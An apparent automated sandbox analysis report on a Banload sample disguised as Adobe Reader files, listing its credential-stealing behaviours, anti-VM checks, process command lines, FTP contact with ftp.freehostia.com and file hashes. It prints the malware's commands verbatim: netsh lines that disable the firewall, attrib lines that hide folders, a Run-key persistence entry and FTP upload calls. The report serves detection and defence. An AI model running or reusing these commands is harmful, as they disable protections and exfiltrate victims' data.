Analysis Overview
SHA256
b1cd8cc9a0147e37004959b11b0555f12b8d320d055aa71f6bd5ec78cedbeb9b
Threat Level: Known bad
The file d7a0da082cbb7b90e1b0fd6c4c8f2991_JaffaCakes118 was found to be: Known bad.
Malicious Activity Summary
Banload
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Credentials from Password Stores: Credentials from Web Browsers
Sets file to hidden
Modifies Windows Firewall
Reads user/profile data of local email clients
Checks BIOS information in registry
Executes dropped EXE
Checks computer location settings
Loads dropped DLL
Reads user/profile data of web browsers
Reads local data of messenger clients
Adds Run key to start application
Accesses Microsoft Outlook accounts
System Location Discovery: System Language Discovery
Unsigned PE
Event Triggered Execution: Netsh Helper DLL
Enumerates physical storage devices
Enumerates system info in registry
Suspicious use of AdjustPrivilegeToken
NTFS ADS
Modifies registry class
Gathers network information
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
Views/modifies file attributes
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2024-09-10 05:10
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-09-10 05:10
Reported
2024-09-10 05:13
Platform
win7-20240903-en
Max time kernel
117s
Max time network
118s
Command Line
Signatures
Banload
Credentials from Password Stores: Credentials from Web Browsers
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr02.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
Sets file to hidden
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr02.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr02.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\Adobeta.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr02.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr02.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\Adobeta.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\AReader.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr02.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
Reads local data of messenger clients
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Accesses Microsoft Outlook accounts
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr02.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Windows\CurrentVersion\Run\AdobeA = "C:\\Users\\Admin\\AppData\\Roaming\\Adobe\\Adobe Inc\\AdobeRead\\acro4.bat" | C:\Windows\SysWOW64\reg.exe | N/A |
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\ipconfig.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\attrib.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\attrib.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr02.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\AReader.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\xcopy.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\Adobeta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\attrib.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr02.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\attrib.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\Adobeta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Order details 20160622131330.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\attrib.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\DllHost.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\SysWOW64\xcopy.exe | N/A |
Gathers network information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\ipconfig.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187} | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\ = "TCImeComponentMgr" | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\InProcServer32 | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\InProcServer32\ = "%SystemRoot%\\SysWow64\\ime\\IMETC10\\IMTCCFG.DLL" | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\InProcServer32\ThreadingModel = "Apartment" | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File opened for modification | C:\ProgramData\TEMP:663565B1 | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr02.exe | N/A |
| File created | C:\ProgramData\TEMP:663565B1 | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| File opened for modification | C:\ProgramData\TEMP:663565B1 | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\DllHost.exe | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\Order details 20160622131330.exe
"C:\Users\Admin\AppData\Local\Temp\Order details 20160622131330.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\Adobedc.vbs"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\Adob03.bat" /quiet /passive /norestart"
C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{76D0CB12-7604-4048-B83C-1005C7DDC503}
C:\Windows\SysWOW64\xcopy.exe
xcopy /y /h /e /r /k /c *.* "C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\"
C:\Windows\SysWOW64\attrib.exe
attrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead"
C:\Windows\SysWOW64\attrib.exe
attrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\Adobe Reader\AdobeR"
C:\Windows\SysWOW64\attrib.exe
attrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\Adobe Reader\ADBR\READER"
C:\Windows\SysWOW64\attrib.exe
attrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER"
C:\Windows\SysWOW64\attrib.exe
attrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\AdobeR"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\Adob9.vbs"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\rea01.bat" /quiet /passive /norestart"
C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\Adobeta.exe
Adobeta.exe -a -c -d -natpasv -s:01.klm ftp.freehostia.com -s
C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "AdobeA" /t REG_SZ /F /D "C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\acro4.bat"
C:\Windows\SysWOW64\ipconfig.exe
ipconfig /all
C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe
adbr01.exe -f "011.011"
C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe
adbr01.exe -f "011.011"
C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr02.exe
adbr02.exe -f "112.112"
C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr02.exe
adbr02.exe -f "112.112"
C:\Windows\SysWOW64\netsh.exe
netsh firewall set opmode disable
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall set currentprofile state off
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall set profiles state off
C:\Windows\SysWOW64\netsh.exe
NetSh Advfirewall set allprofiles state off
C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\Adobeta.exe
Adobeta.exe -a -c -d -natpasv -s:004.afq ftp.freehostia.com
C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\AReader.exe
AReader 5400
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | ftp.freehostia.com | udp |
| US | 198.23.57.8:21 | ftp.freehostia.com | tcp |
Files
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\Adobedc.vbs
| MD5 | ce8041824149d8266dbb0ad9688224d7 |
| SHA1 | 3ab653c43ce66681ceaab90193e1a4c95d998090 |
| SHA256 | 0a697bf8507b3f517afe7d67ed0f12f1a8d0edbb72252d75cc7677d6e2e638c5 |
| SHA512 | e1a205a1665fe5beb3c53cdcff4eb9c66a4773d730215ff87a179f3c825d342f8f7e8b5e65e45e6a1f13dfe7f58a09f5a920ce9416fe231d74ad1d99e60bd21d |
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\Adob03.bat
| MD5 | 97410477dc9501dffca4ea4b1ae57273 |
| SHA1 | fb573b3bf4eba734b0f32db1a5b7ff78de36b064 |
| SHA256 | 3836545f759c1ff93892ea0ef81424c8acdef7dc9440e8404bc04662fe7e6f2c |
| SHA512 | 3d22d0bf5375f3cedc7f6bdc0b2fac8de834a1b80567a2395046c5aada74d87e8338fbd0f787b14dbe3f5914c9a751597f1332d89d19f6d96de195ef334cc915 |
memory/2216-73-0x0000000000510000-0x0000000000512000-memory.dmp
memory/2620-74-0x00000000001D0000-0x00000000001D2000-memory.dmp
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\004.afq
| MD5 | 3599c797ad0bf899791bfa24413c3ab6 |
| SHA1 | 215a520638bb3f1336f268d1acc1170bf2ce0768 |
| SHA256 | 0a9963eefd15805efaef32bf961b354fc255a5a23b4d466aa8e94df53a3c3e8c |
| SHA512 | add003202c97629f2d87d4b7f1876d79dc1ae35cfc85fc55e578adbc3cc009e41ca42c66f33521acb5d8a651fe31d69de5699af1df82ada8227bbeeddbe8d5d1 |
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\acro4.bat
| MD5 | 89412aba215b6cd18b8a64c4485fa03f |
| SHA1 | 37089346499f54a7d89262a67d95c8764ab3ca1f |
| SHA256 | 9607fb2a0e2ea02cd674272680a238d21539071db3c9735818a1abf11ff30ff1 |
| SHA512 | 7afe571b9ad4b67fdf00cecade8645e82471c1c5098b563a2e2d0cff96905f34b6071eb93c86f59850335e7e88d988d6c016553cdbbe1a693e1cdc3082a3790b |
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\adbr01.exe
| MD5 | 3351585db91521d6fa543490ac7cd6a5 |
| SHA1 | 9be2b3abf17613d7386f9949cabaedd466902e82 |
| SHA256 | 3f1749d4a96eb85fe2104fef8d871d9696b456615ff3775d484cc2c2431f40b4 |
| SHA512 | 804b293c02a5526b8c7d5dc48edc18cb33e06a07b39a0b3f46d8d34387e1848b245b087fd820a4a14ac4866c85a120837217ddc9bb47ef32e1b5b80f0dc66d30 |
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\adbr02.exe
| MD5 | 75a35514185cd2c5cf5aab50cc380963 |
| SHA1 | f1ff1e088f910398a48f4f7dfddec24e6d6d1734 |
| SHA256 | 1cf5eb2f7c5cd5b7d036478d30408212494ab73190172c63df67e66350374937 |
| SHA512 | ca6bb433fe5fd4ea350dfa40dd80bb6913ea4693b6ba6188e67f55e4211db9975fd7af570546bce0fd877a3bfeceadd4da9ba9c46c6cb69f9963914739e16297 |
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\Adob9.vbs
| MD5 | 09082253605a7171f078e26dc308a667 |
| SHA1 | 585286c9fcda5e66e7fdb4e17a7bab6160183d46 |
| SHA256 | f4c67dc01ce4bf55e1b574009c49d481dad0d33070f53f42bc76807eb5e324ed |
| SHA512 | adb4a1fec6feada14b8b4f28730e098a0af19f1e7c2fa0fe684030d1171e56c88813661a2352ce598221853fce3dc8a4bb3b2e1dc80b6471c41d2598f635b1d8 |
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\Adobeta.exe
| MD5 | 97b8dbcc7b3cc290aef4241df911ac2e |
| SHA1 | 733ababbcd278821d4e3ee78580841981f26642e |
| SHA256 | c44ca1fe145c4f0dcea4efb95171cbf16dfec9fe66a603fbe29c94c21050a023 |
| SHA512 | 4adaa7621e2c858e6541792146260142e1d28683ec1515a743a56bc106ab425edfce856ef3b0d146d63704b34694c9e666a39e3845a097d41cbf465537ec9b25 |
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\AReader.exe
| MD5 | 1a1075e5e307f3a4b8527110a51ce827 |
| SHA1 | f453838ed21020b7ca059244feea8579e5aa74ef |
| SHA256 | ddd90e3546e95b0991df26a17cf26fa2f1c20d6a1fd4ffccf1e9b3ec3d3810d5 |
| SHA512 | b6b70c6cb3cdb05a69c75b86c1fa0fadb38de0391e1fa17daff7d12dfae2a9f483546d9bf1001ff622694fdf8a28b85cd30fc541c25be62df022d22ca17decc1 |
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\rea01.bat
| MD5 | ce7ccd3b48dbe8f34db3b2b1222e4fd9 |
| SHA1 | e25f9947c2b250c98dffd7bfeaca75b4db17dcfd |
| SHA256 | 6374a35588bd20362e54dff9e8cf0dffba5ba0ec5952a08fb51caea54c5d228e |
| SHA512 | ee6b389f29d30a572c7c9837575df7ff197589824c5377f02b7c453572139d4ecc75c5b194a601b953fbb7e692b3929faf8c4e14e7fec51cd25d71658636ef99 |
memory/1208-128-0x00000000023D0000-0x0000000002684000-memory.dmp
memory/3016-129-0x0000000000400000-0x00000000006B4000-memory.dmp
memory/1208-126-0x00000000023D0000-0x0000000002684000-memory.dmp
memory/2332-131-0x0000000000400000-0x00000000006B4000-memory.dmp
memory/2332-132-0x00000000029F0000-0x0000000002BFC000-memory.dmp
memory/2332-136-0x00000000029F0000-0x0000000002BFC000-memory.dmp
memory/2332-144-0x0000000000400000-0x00000000006B4000-memory.dmp
memory/2332-143-0x0000000000400000-0x00000000006B4000-memory.dmp
memory/2332-145-0x0000000000400000-0x00000000006B4000-memory.dmp
memory/2332-147-0x00000000029F0000-0x0000000002BFC000-memory.dmp
memory/2332-146-0x0000000000400000-0x00000000006B4000-memory.dmp
memory/2332-156-0x00000000029F0000-0x0000000002BFC000-memory.dmp
memory/3016-158-0x0000000000400000-0x00000000006B4000-memory.dmp
memory/1208-163-0x00000000023D0000-0x0000000002687000-memory.dmp
memory/2040-169-0x00000000024E0000-0x0000000002797000-memory.dmp
memory/1068-168-0x0000000000400000-0x00000000006B7000-memory.dmp
memory/2040-167-0x0000000000400000-0x00000000006B7000-memory.dmp
memory/1208-166-0x00000000023D0000-0x0000000002687000-memory.dmp
memory/1068-174-0x0000000002640000-0x000000000284C000-memory.dmp
memory/1068-170-0x0000000002640000-0x000000000284C000-memory.dmp
C:\ProgramData\TEMP\RAIDTest
| MD5 | c2f09542b6c7daf4288f3524c8cebb18 |
| SHA1 | 9430b21baf07f0d105b9ee5fdd9f868418454517 |
| SHA256 | 55d7808233c58f1606fff77eb382a02ed729bf5d8b2640fb313d0f7c91e970d4 |
| SHA512 | dcc19cfbc78b78708ce2586228424194f846d80b6d072045baaf93559d20f71e809a4eb57e7dac3b4ea109d90aeb585d0b5438dc1dd7d34054c03aa6350d6672 |
C:\ProgramData\Licenses\086A4C8982A52E70F.Lic
| MD5 | 903e471719ec26a020004f138ad06ada |
| SHA1 | 348fd233568748356e8607519bd0c21e2398ba1b |
| SHA256 | 2b45902f8d0be1b685dc90905296e016c808f341c6a7bdc2c72583872922f576 |
| SHA512 | 5b4040fd06e45b75af385994a091a3123349196fc824db257185ea4af3fce5dec939bbb991cb82580950a5d0da87c81dcf25f9bee4d7493ede66eac3d4c5c40b |
C:\ProgramData\TEMP:663565B1
| MD5 | be7b65dda4a6319a76aa15040aa263e1 |
| SHA1 | 00e47507b992cbae5eed39d0ed800714e028e2be |
| SHA256 | 719c01446930ec46dddff0289553195217c8d7dc8746d4944af5de802f57a474 |
| SHA512 | 5253c72628d5dcd209fe7a5e2ff5c716f35ed37402ac9536b1d89b9155dafb479fddf2cd5236951f1c2420c0686e387712d11160eb32142afb22fbdcc7fd0870 |
memory/1068-187-0x0000000002640000-0x000000000284C000-memory.dmp
memory/1068-186-0x0000000000400000-0x00000000006B7000-memory.dmp
memory/1068-185-0x0000000000400000-0x00000000006B7000-memory.dmp
memory/1068-184-0x0000000000400000-0x00000000006B7000-memory.dmp
memory/1068-183-0x0000000000400000-0x00000000006B7000-memory.dmp
memory/1068-190-0x0000000002640000-0x000000000284C000-memory.dmp
C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\112.112
| MD5 | 3c305699054489d4ba953729549294b8 |
| SHA1 | 272b920622013b83dc073c26b75f5968663496c5 |
| SHA256 | 52392e1693a81b409ab85297d0dc90dd360b0fd3ba022341499ab3f23add16d8 |
| SHA512 | 7051b5a88aa709cf6496bddd82c91cc8d198390825c202ec34d1295e1070e62cf92566390dbd083b091a7c83d539d17751790e9cba569f4f566cd90de488000b |
C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\011.011
| MD5 | 22b8646b6edd49e6c7def1f114cba44b |
| SHA1 | cb66e1b79780b37a5dede397badfb734132b23d6 |
| SHA256 | d83e6b884fb99e97409952324934255521ef96d6c729104337b2dc1422d7996d |
| SHA512 | 8bd2fae0e2b3bd7f320c9836ad7cfc663aee5ce5834b9fca6f4bf91500a7cd1c435048ef3f87f86ab112bf92f0b18bdeca5abc36b5fd371b5211c1d0c0d67215 |
memory/2040-196-0x0000000000400000-0x00000000006B7000-memory.dmp
memory/1068-193-0x0000000002640000-0x000000000284C000-memory.dmp
memory/1208-210-0x00000000023D0000-0x0000000002687000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-09-10 05:10
Reported
2024-09-10 05:13
Platform
win10v2004-20240802-en
Max time kernel
125s
Max time network
127s
Command Line
Signatures
Banload
Credentials from Password Stores: Credentials from Web Browsers
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr02.exe | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
Sets file to hidden
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr02.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
